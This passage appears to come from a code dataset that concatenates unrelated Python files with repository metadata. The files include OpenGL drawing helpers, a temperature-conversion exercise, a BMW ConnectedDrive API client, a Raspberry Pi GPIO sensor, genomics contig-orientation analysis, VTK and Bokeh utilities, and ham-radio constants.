if timeit and not shared.start_tp:
now = shared.time.time()
shared.start_tp = now
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
def drawCircle(r, x=0.0, y=0.0, fill=True, color=C_white, width=1, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
'''
Draw circle on the canvas.
Parameters
----------
r: int
The radius of circle in pixel.
x: int, or float (default:0.0)
The x coordinate of circle.
If x is int, the coordinate would be pixel number to the left margin of screen;
If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
y: int, or float (default:0.0)
The y coordinate of circle.
If y is int, the coordinate would be pixel number to the upper margin of screen;
If y is float (-1~1), the coordinate would be percentage of half screen to the screen center.
fill: True(default), False
Whether to fill out the blank in circle
color: RGB tuple, or pre-defined variable (default:'C_white')
The font color of text, you can either use an RGB value or a pre-defined color name.
The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
width: int (default: 1)
The width of each line
anchor_x: str (default:'center')
The position benchmark on this object to the given x.
Options: 'center', 'left', or 'right'.
anchor_y: str (default:'center')
The position benchmark on this object to the given y.
Options: 'center', 'top', or 'bottom'.
show_now: True(default), False
If True, the function will put the canvas onto the screen.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
None
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
x, y = getPos(x, y, anchor_x='center', anchor_y='center')
if fill:
numPoints = int(2 * r * math.pi)
s = math.sin(2 * math.pi / numPoints)
c = math.cos(2 * math.pi / numPoints)
dx, dy = r, 0
shared.gl.glBegin(shared.gl.GL_TRIANGLE_FAN)
shared.gl.glColor4f(*color)
shared.gl.glVertex2f(x, y)
for i in range(numPoints + 1):
shared.gl.glVertex2f(x + dx, y + dy)
dx, dy = (dx * c - dy * s), (dy * c + dx * s)
shared.gl.glEnd()
else:
numPoints = int(2 * r * math.pi)
verts = []
for i in range(numPoints):
angle = math.radians(float(i) / numPoints * 360.0)
verts += [r * math.cos(angle) + x, r * math.sin(angle) + y]
circle = shared.pyglet.graphics.vertex_list(numPoints,
('v2f', verts),
('c4B', color * numPoints))
shared.gl.glClear(shared.pyglet.gl.GL_COLOR_BUFFER_BIT)
# shared.gl.glColor4b(*color)
circle.draw(shared.gl.GL_LINE_LOOP)
if show_now:
shared.win.flip()
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
def drawPoints(points, color=C_white, size=1, show_now=True, display=True, timeit=False, trigger=None):
'''
Draw point(s) on the canvas.
Parameters
----------
points: list of tuple
The x-y points list
If the x,y are given as float, they would be interpret as an relative position[-1~+1] to the center on the screen;
or if they are given as int, they would be interpret as pixel indicators to the lowerleft corner on the screen.
Examples:
[(0.0,0.0), (0.5,0), (0.5,0.5)]
color: RGB tuple, or pre-defined variable (default:'C_white')
The font color of text, you can either use an RGB value or a pre-defined color name.
The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
size: int (default: 1)
The size of each point
show_now: True(default), False
If True, the function will put the canvas onto the screen.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
None
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
new_points = []
for x, y in points:
if type(x) is float:
new_points += [(0.5 + x / 2) * shared.win_width,
(0.5 + y / 2) * shared.win_height]
else:
new_points += [x, y]
shared.gl.glPointSize(size)
shared.pyglet.graphics.draw(len(new_points) // 2, shared.gl.GL_POINTS,
('v2i', new_points),
('c4B', color * (len(new_points) // 2))
)
if show_now:
shared.win.flip()
if timeit and not shared.start_tp:
now = shared.time.time()
shared.start_tp = now
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
def drawLines(points, color=C_white, width=1, close=False, show_now=True, display=True, timeit=False, trigger=None):
'''
Draw line(s) on the canvas.
Parameters
----------
points: list of tuple
The turning x-y points of lines
If the x,y are given as float, they would be interpret as an relative position[-1~+1] to the center on the screen;
or if they are given as int, they would be interpret as pixel indicators to the lowerleft corner on the screen.
Examples:
[(0.0,0.0), (0.5,0), (0.5,0.5)]
color: RGB tuple, or pre-defined variable (default:'C_white')
The font color of text, you can either use an RGB value or a pre-defined color name.
The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
width: int (default: 1)
The width of each line
close: True, False(default)
Whether to connect the last point with the first one.
If True, the polygon could be drawn.
show_now: True(default), False
If True, the function will put the canvas onto the screen.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
None
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
new_points = []
if close:
points += [points[0]]
for x, y in points:
if type(x) is float:
new_points += [(0.5 + x / 2) * shared.win_width,
(0.5 + y / 2) * shared.win_height]
else:
new_points += [x, y]
shared.pyglet.gl.glLineWidth(width)
shared.pyglet.graphics.draw(len(new_points) // 2, shared.gl.GL_LINE_STRIP,
('v2i', new_points),
('c4B', color * (len(new_points) // 2))
)
if show_now:
shared.win.flip()
if timeit and not shared.start_tp:
now = shared.time.time()
shared.start_tp = now
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
def drawPic(path, w=0, h=0, x=0.0, y=0.0, rotate=0, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
'''
Draw loaded image on the canvas.
Parameters
----------
path: str
The file path of target image
w: int(default:0), or float
The width of image.
If w is float, it represents the width scale on screen;
if int, it represents the width in pixel.
h: int(default:0), or float
The height of image.
If w is float, it represents the height scale on screen;
if int, it represents the height in pixel.
x: int, or float (default:0.0)
The x coordinate of image.
If x is int, the coordinate would be pixel number to the left margin of screen;
If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
y: int, or float (default:0.0)
The y coordinate of image.
If y is int, the coordinate would be pixel number to the upper margin of screen;
If y is float (-1~1), the coordinate would be percentage of half screen to the screen center.
rotation: int (default:0)
The rotation angle of object.
anchor_x: str (default:'center')
The position benchmark on this object to the given x.
Options: 'center', 'left', or 'right'.
anchor_y: str (default:'center')
The position benchmark on this object to the given y.
Options: 'center', 'top', or 'bottom'.
show_now: True(default), False
If True, the function will put the canvas onto the screen.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
None
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
im = shared.pyglet.image.load(path)
if type(w) is float:
w = (0.5 + w / 2) * shared.win_width
if type(h) is float:
h = (0.5 + h / 2) * shared.win_height
if w > 0 and h > 0:
im = im.get_texture()
shared.gl.glTexParameteri(
shared.gl.GL_TEXTURE_2D,
shared.gl.GL_TEXTURE_MAG_FILTER,
shared.gl.GL_NEAREST)
im.width = w
im.height = h
else:
w, h = im.width, im.height
x, y, w, h = getPos(x, y, w, h, anchor_x=anchor_x, anchor_y=anchor_y)
im.blit(x, y, 0)
if show_now:
shared.win.flip()
if timeit and not shared.start_tp:
now = shared.time.time()
shared.start_tp = now
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
|
ray306/expy
|
stim/draw.py
|
Python
|
gpl-3.0
| 19,988
|
"""
Faça agora o contrário, de Fahrenheit para Celsius.
Converta uma temperatura digitada em Celsius para Fahrenheit. F = 9*C/5 + 32
"""
import sys
a = input('Digite uma temperatura em Graus Fahrenheit\n')
try:
fahreinheit = int(a)
except ValueError:
try:
fahreinheit = float(a)
except ValueError:
print('Precisa ser um número')
sys.exit(0)
celsius = float(5 / 9 * (fahreinheit - 32))
print("O valor desta temperatura em Celsius é de %.2f ºc" % celsius)
|
alexisbrabo/python_para_zumbis
|
lista_de_exercicios_1/8.py
|
Python
|
gpl-3.0
| 529
|
#! /usr/bin/env python
#
# Use the BMW ConnectedDrive API using credentials from credentials.json
# You can see what should be in there by looking at credentials.json.sample.
#
# 'auth_basic' is the base64-encoded version of API key:API secret
# You can capture it if you can intercept the traffic from the app at
# the time when reauthentication is happening.
#
# Based on the excellent work by Terence Eden:
# https://github.com/edent/BMW-i-Remote
import json
import requests
import time
# API Gateway
# North America: b2vapi.bmwgroup.us
# Rest of World: b2vapi.bmwgroup.com
# China: b2vapi.bmwgroup.cn:8592
SERVER = "b2vapi.bmwgroup.us"
AUTH_URL = 'https://' + SERVER + '/gcdm/oauth/token'
API_ROOT_URL = 'https://' + SERVER + '/webapi/v1'
# What are we pretending to be? Not sure if this is important.
# Might be tied to OAuth consumer (auth_basic) credentials?
USER_AGENT = "MCVApp/1.5.2 (iPhone; iOS 9.1; Scale/2.00)"
# USER_AGENT = "Dalvik/2.1.0 (Linux; U; Android 5.1.1; Nexus 6 Build/LMY48Y)"
# Constants
# To convert km to miles:
# miles = km * KM_TO_MILES
KM_TO_MILES = 0.621371
# To convert kWh/100Km to Miles/kWh:
# 1 / (EFFICIENCY * avgElectricConsumption)`
EFFICIENCY = 0.01609344
# For future use
class ConnectedDriveException(Exception):
pass
class ConnectedDrive(object):
"""
A wrapper for the BMW ConnectedDrive API used by mobile apps.
Caches credentials in credentials_file, so needs both read
and write access to it.
"""
def __init__(self, credentials_file='credentials.json'):
self.credentials_file = credentials_file
with open(self.credentials_file,"r") as cf:
credentials = json.load(cf)
self.username = credentials["username"]
self.password = credentials["password"]
self.auth_basic = credentials["auth_basic"]
self.access_token = credentials["access_token"]
self.token_expiry = credentials["token_expiry"]
# If the access_token has expired, generate a new one and use that
if (time.time() > self.token_expiry):
self.generateCredentials()
def generateCredentials(self):
"""
If previous token has expired, create a new one from basics.
"""
headers = {
"Authorization": "Basic " + self.auth_basic,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": USER_AGENT
}
data = {
"grant_type": "password",
"username": self.username,
"password": self.password,
"scope": "remote_services vehicle_data"
}
r = requests.post(AUTH_URL, data=data, headers=headers)
json_data = r.json()
# Get the access token
self.access_token = json_data["access_token"]
self.token_expiry = time.time() + json_data["expires_in"]
self.saveCredentials()
def saveCredentials(self):
"""
Save current state to the JSON file.
"""
credentials = {
"username": self.username,
"password": self.password,
"auth_basic": self.auth_basic,
"access_token": self.access_token,
"token_expiry": self.token_expiry
}
# Open a file for writing
with open(self.credentials_file, "w") as credentials_file:
json.dump(credentials, credentials_file, indent=4)
def call(self, path, post_data=None):
"""
Call the API at the given path.
Argument should be relative to the API base URL, e.g:
print c.call('/user/vehicles/')
If a dictionary 'post_data' is specified, the request will be
a POST, otherwise a GET.
"""
#
if (time.time() > self.token_expiry):
self.generateCredentials()
headers = {"Authorization": "Bearer " + self.access_token,
"User-Agent":USER_AGENT}
if post_data is None:
r = requests.get(API_ROOT_URL + path, headers=headers)
else:
r = requests.post(API_ROOT_URL + path, headers=headers, data=post_data)
return r.json()
def executeService(self, vin, serviceType):
"""
Post a request for the specified service. e.g.
print c.executeService(vin, 'DOOR_LOCK')
"""
return self.call("/user/vehicles/{}/executeService".format(vin),
{'serviceType': serviceType})
# A simple test example
def main():
c = ConnectedDrive()
print "\nVehicle info"
resp = c.call('/user/vehicles/')
car = resp['vehicles'][0]
for k,v in car.items():
print " ",k, " : ", v
print "\nVehicle status"
status = c.call("/user/vehicles/{}/status".format(car['vin']))['vehicleStatus']
for k,v in status.items():
print " ", k, " : ", v
if __name__ == '__main__':
main()
|
edent/BMW-i-Remote
|
python/bmw.py
|
Python
|
mit
| 4,929
|
''' Download the Bokeh sample data sets to local disk.
To download the Bokeh sample data sets, execute
.. code-block:: sh
bokeh sampledata
on the command line.
Executing this command is equivalent to running the Python code
.. code-block:: python
import bokeh.sampledata
bokeh.sampledata.download()
'''
from __future__ import absolute_import
from bokeh import sampledata
from ..subcommand import Subcommand
class Sampledata(Subcommand):
''' Subcommand to download bokeh sample data sets.
'''
#: name for this subcommand
name = "sampledata"
help = "Download the bokeh sample data sets"
args = (
)
def invoke(self, args):
'''
'''
sampledata.download()
|
Karel-van-de-Plassche/bokeh
|
bokeh/command/subcommands/sampledata.py
|
Python
|
bsd-3-clause
| 736
|
#!/usr/bin/env python3
# written by sqall
# twitter: https://twitter.com/sqall01
# blog: https://h4des.org
# github: https://github.com/sqall01
#
# Licensed under the GNU Affero General Public License, version 3.
import RPi.GPIO as GPIO
import os
import time
from .core import _PollingSensor
from ..globalData import SensorDataType
from ..globalData.sensorObjects import SensorDataNone
class RaspberryPiGPIOInterruptSensor(_PollingSensor):
"""
Uses edge detection to check a gpio pin of the raspberry pi.
"""
def __init__(self):
_PollingSensor.__init__(self)
self._log_tag = os.path.basename(__file__)
# Set sensor to not hold any data.
self.sensorDataType = SensorDataType.NONE
self.data = SensorDataNone()
# the gpio pin number (NOTE: python uses the actual
# pin number and not the gpio number)
self.gpioPin = None
# time that has to go by between two triggers
self.delayBetweenTriggers = None
# time a sensor is seen as triggered
self.timeSensorTriggered = None
# the last time the sensor was triggered
self._last_time_triggered = 0.0
# the configured edge detection
self.edge = None
# the count of interrupts that has to occur before
# an alert is triggered
# this is used to relax the edge detection a little bit
# for example an interrupt is triggered when an falling/rising
# edge is detected, if your wiring is not good enough isolated
# it can happen that electro magnetic radiation (because of
# a starting vacuum cleaner for example) causes a falling/rising edge
# this option abuses the bouncing of the wiring, this means
# that the radiation for example only triggers one rising/falling
# edge and your normal wiring could cause like four detected edges
# when it is triggered because of the signal bouncing
# so you could use this circumstance to determine correct triggers
# from false triggers by setting a threshold of edges that have
# to be reached before an alert is executed
self.edgeCountBeforeTrigger = 0
self._edge_counter = 0
# configures if the gpio input is pulled up or down
self.pulledUpOrDown = None
# used as internal state set by the interrupt callback
self._internal_state = None
def _execute(self):
while True:
if self._exit_flag:
return
time.sleep(0.5)
# Check if the sensor is triggered and if it is longer triggered than configured
# => set internal state to normal
utc_timestamp = int(time.time())
if (self.state == self.triggerState
and ((utc_timestamp - self._last_time_triggered) > self.timeSensorTriggered)):
self._internal_state = 1 - self.triggerState
if self.state != self._internal_state:
self._add_sensor_alert(self._internal_state,
True)
def _interrupt_callback(self, gpioPin: int):
# Check if the last time we detected an interrupt is longer ago than the configured delay between two triggers
# => set time and reset edge counter
utc_timestamp = int(time.time())
if (utc_timestamp - self._last_time_triggered) > self.delayBetweenTriggers:
self._edge_counter = 0
self._last_time_triggered = utc_timestamp
self._edge_counter += 1
self._log_debug(self._log_tag, "%d Interrupt for sensor triggered." % self._edge_counter)
# if edge counter reaches threshold
# => trigger state
if self._edge_counter >= self.edgeCountBeforeTrigger:
self._internal_state = self.triggerState
self._log_debug(self._log_tag, "Sensor triggered.")
def initialize(self) -> bool:
# Get the value for the setting if the gpio is pulled up or down.
if self.pulledUpOrDown == 0:
pulledUpOrDown = GPIO.PUD_DOWN
elif self.pulledUpOrDown == 1:
pulledUpOrDown = GPIO.PUD_UP
else:
self._log_critical(self._log_tag, "Value for pulled up or down setting not known.")
return False
# Configure gpio pin and get initial state.
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.gpioPin, GPIO.IN, pull_up_down=pulledUpOrDown)
# set initial state to not triggered
self.state = 1 - self.triggerState
self._internal_state = 1 - self.triggerState
# set edge detection
if self.edge == 0:
GPIO.add_event_detect(self.gpioPin,
GPIO.FALLING,
callback=self._interrupt_callback)
elif self.edge == 1:
GPIO.add_event_detect(self.gpioPin,
GPIO.RISING,
callback=self._interrupt_callback)
else:
self._log_critical(self._log_tag, "Value for edge detection not known.")
return False
return True
|
sqall01/alertR
|
sensorClientRaspberryPi/lib/sensor/interrupt.py
|
Python
|
agpl-3.0
| 5,191
|
# Main script for orienting
# Modules in orienting_mods.py which could be moved to triangulation.py later
# Example:
# python orienting.py -in Dixon12_hESC-AllpathsLGcontigs.tab -out results -pos contigs_pos.tab -real_ori contig_orientations.tab
########################################################################################################################
import orienting_mods
import triangulation
import numpy as np
import sys
import argparse
import matplotlib.pyplot as plt
def main():
parser = argparse.ArgumentParser(description = 'Orient contigs within chromosome given interaction matrix.', formatter_class = argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-in', help = 'interaction frequency matrix file', dest = 'in_file', type = str, required = True)
parser.add_argument('-out', help = 'out file prefix', dest = 'out_file', type = str, required = True)
parser.add_argument('-pos', help = 'file with contig positions. "contig\tstart\tend"', dest = 'pos_file', type = str, required = True)
parser.add_argument('-real_ori', help = 'file with real orientations. "contig\tsign"', dest = 'real_ori_file', type = str, default = None)
args = parser.parse_args()
in_file = args.in_file
out_file = args.out_file
pos_file = args.pos_file
real_ori_file = args.real_ori_file
# Read contig interacion file
d, bin_chr, bin_position = triangulation.load_data_txt(in_file, remove_nans = True)
# Read contig pos file into dictionary
ID_col = 0
start_col = 1
end_col = 2
IDs = []
starts = []
ends = []
pos_fh = open(pos_file, 'r')
for line in pos_fh:
contig_line = line.split()
IDs.append(contig_line[ID_col])
starts.append(float(contig_line[start_col]))
ends.append(float(contig_line[end_col]))
pos_fh.close()
# Create position dictionary for downstream analysis
pos_dic = orienting_mods.make_pos_dic(IDs, starts, ends)
# Sort contigs by their positions
sorted_contigs_extra = orienting_mods.sort_by_pos(IDs, starts)
# Use only contigs that are in interaction matrix
sorted_contigs = []
for contig in sorted_contigs_extra:
if contig in bin_chr:
sorted_contigs.append(contig)
# Calculate bin centers
bin_center = np.mean(bin_position, axis = 1)
# Calculate the 4 orientation scores (edge wights) between each pair of contigs
# Return the weighted directed acyclic graph object
WDAG = orienting_mods.make_WDAG(d, bin_chr, bin_position, bin_center, sorted_contigs)
# Create sorted node list for input into shortest_path function
node_list = orienting_mods.sorted_nodes(sorted_contigs)
# Find shortest path through WDAG
orientation_results = orienting_mods.shortest_path(WDAG, node_list)
# Create output file for predicted orientations
OUT = open(out_file + '_pred_ori.txt', 'w+')
# Remove start and end node from orientation result list
orientation_results.remove("start")
orientation_results.remove("end")
# Format output results (Note contigs with single-bins default to forward)
for contig in orientation_results:
contig_ID = contig[:-3]
orientation = contig[-2:]
if orientation == "fw":
orientation = "+"
elif orientation == "rc":
orientation = "-"
else:
print "Error in formatting output!"
OUT.write(contig_ID + "\t" + orientation + "\n")
OUT.close()
if real_ori_file != None:
# Open true orientation data to test results against
true_fh = open(real_ori_file, 'r')
ID_col = 0
orient_col = 1
true_dic = {}
for line in true_fh:
contig_line = line.split()
contig_ID = contig_line[ID_col]
orientation = contig_line[orient_col]
true_dic[contig_ID] = orientation
true_fh.close()
# Record accuracy of prediction at different confidence thesholds
# Get max confidence
max_conf = orienting_mods.get_max_conf(WDAG, sorted_contigs)
thresholds = np.arange(0.0, max_conf, max_conf/200.0)
accuracy_list = []
# Record percent of contigs removed
percent_removed = []
for threshold in thresholds:
poor_conf = orienting_mods.poor_confidence(WDAG, sorted_contigs, threshold)
percent_removed.append(float(len(poor_conf))/float(len(sorted_contigs)))
# Calculate sensitivity, specificity, and accuracy such that fw is (+) and rc is (-)
# Accuracy will be percent of orientations correctly predicted out of total contig orientations
# Create prediction dictionary for orientation results
pred_dic = orienting_mods.make_pred_dic(orientation_results, poor_conf)
# Need to remove all contigs from true dictionary that are not in our prediction dictionary
adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
# Calculate stats
P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
accuracy_list.append(accuracy)
# Plot results
y_bottom = min(accuracy_list + percent_removed)
fig, ax1 = plt.subplots()
ax1.plot(thresholds, accuracy_list)
ax1.set_xlabel("Confidence threshold")
ax1.set_title("Accuracy vs Confidence")
ax1.set_ylim(y_bottom-0.1, 1.0)
ax1.set_ylabel("Accuracy", color = 'b')
for t1 in ax1.get_yticklabels():
t1.set_color('b')
ax2 = ax1.twinx()
ax2.plot(thresholds, percent_removed, 'r-')
ax2.set_ylabel("Percent contigs removed", color = 'r')
ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
ax2.set_ylim(y_bottom-0.1, 1.0)
for t1 in ax2.get_yticklabels():
t1.set_color('r')
plt.savefig(out_file + '_acc_conf_plot.png')
# Record accuracy of prediction at different contig size thresholds
# Get max contig length of all contigs with positions
max_length = orienting_mods.get_max_length(bin_chr, bin_position, sorted_contigs)
contig_lengths = np.arange(0.0, max_length, max_length/200.0)
accuracy_list = []
percent_removed = []
for contig_length in contig_lengths:
# Get all contigs with length < = length of threshold
small_contigs = orienting_mods.get_small_contigs(bin_chr, bin_position, sorted_contigs, contig_length)
# Add all single bin/score zero contigs to list of contigs to be removed
score_zeros = orienting_mods.poor_confidence(WDAG, sorted_contigs, 0.0)
remove_contigs = list(set(small_contigs).union(set(score_zeros)))
percent_removed.append(float(len(remove_contigs))/float(len(sorted_contigs)))
pred_dic = orienting_mods.make_pred_dic(orientation_results, remove_contigs)
# Need to remove all contigs from true dictionary that are not in our prediction dictionary
adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
# Calculate stats
P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
accuracy_list.append(accuracy)
# Plot results
y_bottom = min(accuracy_list + percent_removed)
fig, ax1 = plt.subplots()
ax1.plot(contig_lengths, accuracy_list)
ax1.set_xlabel("Contig length threshold")
ax1.set_title("Accuracy vs Contig Length")
ax1.set_ylim(y_bottom-0.1, 1.0)
ax1.set_ylabel("Accuracy", color = 'b')
for t1 in ax1.get_yticklabels():
t1.set_color('b')
ax2 = ax1.twinx()
ax2.plot(contig_lengths, percent_removed, 'r-')
ax2.set_ylabel("Percent contigs removed", color = 'r')
ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
ax2.set_ylim(y_bottom-0.1, 1.0)
for t1 in ax2.get_yticklabels():
t1.set_color('r')
plt.savefig(out_file + '_acc_size_plot.png')
# Record accuracy of prediction at different gap size thresholds
# Get max gap size between all contigs and min gap size between all contigs
max_gap, min_gap = orienting_mods.get_max_min_gap(sorted_contigs, pos_dic)
gap_lengths = np.arange(max_gap, min_gap, -max_gap/200.0)
accuracy_list = []
percent_removed = []
for gap_length in gap_lengths:
# Get all contigs with gap size > = gap of threshold
big_gaps = orienting_mods.get_big_gaps(pos_dic, sorted_contigs, gap_length)
remove_contigs = list(set(big_gaps).union(set(score_zeros)))
percent_removed.append(float(len(remove_contigs))/float(len(sorted_contigs)))
pred_dic = orienting_mods.make_pred_dic(orientation_results, remove_contigs)
adj_true_dic = orienting_mods.adjust_true_dic(true_dic, pred_dic)
# Calculate stats
P, N, TP, TN, accuracy = orienting_mods.calc_stats(adj_true_dic, pred_dic)
accuracy_list.append(accuracy)
# Plot results
y_bottom = min(accuracy_list + percent_removed)
fig, ax1 = plt.subplots()
ax1.plot(gap_lengths, accuracy_list)
ax1.set_xlabel("Gap length threshold")
ax1.set_title("Accuracy vs Gap Length")
ax1.set_ylim(y_bottom-0.1, 1.0)
ax1.set_ylabel("Accuracy", color = 'b')
for t1 in ax1.get_yticklabels():
t1.set_color('b')
ax2 = ax1.twinx()
ax2.plot(gap_lengths, percent_removed, 'r-')
ax2.set_ylabel("Percent contigs removed", color = 'r')
ax2.ticklabel_format(style = 'sci', axis = 'x', scilimits = (0, 0))
ax2.set_ylim(y_bottom-0.1, 1.0)
ax2.invert_xaxis()
for t1 in ax2.get_yticklabels():
t1.set_color('r')
plt.savefig(out_file + '_acc_gaps_plot.png')
if __name__ == "__main__":
main()
|
lpryszcz/HiCembler
|
.dna-triangulation/orienting.py
|
Python
|
gpl-3.0
| 9,214
|
#!/usr/bin/env python
from mvbb.box_db import MVBBLoader
import multiprocessing, subprocess
from multiprocessing import Pool
import sys
from plugins import soft_hand
def grasp_boxes(filename):
subprocess.call(['python', './grasp_boxes_batch.py', filename])
if __name__ == '__main__':
try:
import os.path
filename = os.path.splitext(sys.argv[1])[0]
except:
filename = 'box_db'
if not os.path.isfile(filename+'.csv'):
print "Error: file", filename, "doesn't exist"
exit()
try:
n_dofs = int(sys.argv[2])
n_l = int(sys.argv[3])
except:
n_dofs = soft_hand.numJoints
n_l = len(soft_hand.links_to_check)
# for SoftHand
box_db = MVBBLoader(filename, n_dofs, n_l)
filenames = box_db.split_db()
p = Pool(multiprocessing.cpu_count())
p.map(grasp_boxes, filenames)
box_db.join_results(filenames)
|
lia2790/grasp_learning
|
python/simple_batch_splitter.py
|
Python
|
bsd-3-clause
| 913
|
"""this is python equivalent of ./Wrapping/Tcl/vtktesting/backdrop.tcl
This script is used while running python tests translated from Tcl."""
import vtk
basePlane = None
baseMapper = None
base = None
backPlane = None
backMapper = None
back = None
leftPlane = None
leftMapper = None
left = None
def BuildBackdrop (minX, maxX, minY, maxY, minZ, maxZ, thickness):
global basePlane
global baseMapper
global base
global backPlane
global backMapper
global back
global left
global leftPlane
global leftMapper
if not basePlane:
basePlane = vtk.vtkCubeSource()
basePlane.SetCenter( (maxX + minX)/2.0, minY, (maxZ + minZ)/2.0)
basePlane.SetXLength(maxX-minX)
basePlane.SetYLength(thickness)
basePlane.SetZLength(maxZ - minZ)
if not baseMapper:
baseMapper = vtk.vtkPolyDataMapper()
baseMapper.SetInputConnection(basePlane.GetOutputPort())
if not base:
base = vtk.vtkActor()
base.SetMapper(baseMapper)
if not backPlane:
backPlane = vtk.vtkCubeSource()
backPlane.SetCenter( (maxX + minX)/2.0, (maxY + minY)/2.0, minZ)
backPlane.SetXLength(maxX-minX)
backPlane.SetYLength(maxY - minY)
backPlane.SetZLength(thickness)
if not backMapper:
backMapper = vtk.vtkPolyDataMapper()
backMapper.SetInputConnection(backPlane.GetOutputPort())
if not back:
back = vtk.vtkActor()
back.SetMapper(backMapper)
if not leftPlane:
leftPlane = vtk.vtkCubeSource()
leftPlane.SetCenter( minX, (maxY+minY)/2.0, (maxZ+minZ)/2.0)
leftPlane.SetXLength(thickness)
leftPlane.SetYLength(maxY-minY)
leftPlane.SetZLength(maxZ-minZ)
if not leftMapper:
leftMapper = vtk.vtkPolyDataMapper()
leftMapper.SetInputConnection(leftPlane.GetOutputPort())
if not left:
left = vtk.vtkActor()
left.SetMapper(leftMapper)
return [base, back, left]
|
cjh1/vtkmodular
|
Utilities/vtkTclTest2Py/backdrop.py
|
Python
|
bsd-3-clause
| 1,927
|
class LookupConventions:
""" This class defines the constants used within the pyhamtools package """
# Mostly specific to Clublog XML File
CALLSIGN = u"callsign"
COUNTRY = u"country"
PREFIX = u"prefix"
ADIF = u"adif"
CQZ = u"cqz"
ITUZ = u"ituz"
CONTINENT = u"continent"
LATITUDE = u"latitude"
LONGITUDE = u"longitude"
START = u"start"
END = u"end"
WHITELIST = u"whitelist"
WHITELIST_START = u"whitelist_start"
WHITELIST_END = u"whitelist_end"
DELETED = u"deleted"
MARITIME_MOBILE = u"mm"
AIRCRAFT_MOBILE = u"am"
LOCATOR = u"locator"
BEACON = u"beacon"
#CQ / DIGITAL Skimmer specific
SKIMMER = u"skimmer"
FS = u"fs" #fieldstrength
WPM = u"wpm" #words / bytes per second
CQ = u"cq"
NCDXF = u"ncdxf"
# Modes
CW = u"CW"
USB = u"USB"
LSB = u"LSB"
DIGITAL = u"DIGITAL"
FM = u"FM"
# FT8 = u'FT8'
#DX Spot
SPOTTER = u"spotter"
DX = u"dx"
FREQUENCY = u"frequency"
COMMENT = u"comment"
TIME = u"time"
BAND = u"band"
MODE = u"mode"
#DX Spider specific
ORIGIN_NODE = u"node"
HOPS = u"hops"
RAW_SPOT = u"raw"
IP = u"ip"
ROUTE = u"route"
TEXT = u"text"
SYSOP_FLAG = u"sysop_flag"
WX_FLAG = u"wx_flag"
#WWV & WCY
STATION = u"station"
R = u"r"
K = u"k"
EXPK = u"expk"
SFI = u"sfi"
A = u"a"
AURORA = u"aurora"
SA = u"sa"
GMF = u"gmf"
FORECAST = u"forecast"
#QRZ.com
XREF = u"xref"
ALIASES = u"aliases"
FNAME = u"fname"
NAME = u"name"
ADDR1 = u"addr1"
ADDR2 = u"addr2"
STATE = u"state"
ZIPCODE = u"zipcode"
CCODE = u"ccode"
COUNTY = u"county"
FIPS = u"fips"
LAND = u"land"
EFDATE = u"efdate"
EXPDATE = u"expdate"
P_CALL = u"p_call"
LICENSE_CLASS = u"license_class"
CODES = u"codes"
QSLMGR = u"qslmgr"
EMAIL = u"email"
URL = u"url"
U_VIEWS = u"u_views"
BIO = u"bio"
BIODATE = u"biodate"
IMAGE = u"image"
IMAGE_INFO = u"imageinfo"
SERIAL = u"serial"
MODDATE = u"moddate"
MSA = "msa"
AREACODE = "areacode"
TIMEZONE = "timezone"
GMTOFFSET = "gmtoffset"
DST = "dst"
EQSL = "eqsl"
MQSL = "mqsl"
LOTW = "lotw"
BORN = "born"
USER_MGR = "user"
IOTA = "iota"
GEOLOC = "geoloc"
|
dh1tw/pyhamtools
|
pyhamtools/consts.py
|
Python
|
mit
| 2,368
|
from decimal import Decimal
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms.fields import Field
from django.forms.formsets import formset_factory, BaseFormSet
import commonware
import happyforms
from slumber.exceptions import HttpClientError
from tower import ugettext as _, ugettext_lazy as _lazy
import mkt
from lib.pay_server import client
from mkt.api.forms import SluggableModelChoiceField
from mkt.constants import (BANGO_COUNTRIES, BANGO_OUTPAYMENT_CURRENCIES,
FREE_PLATFORMS, PAID_PLATFORMS)
from mkt.constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
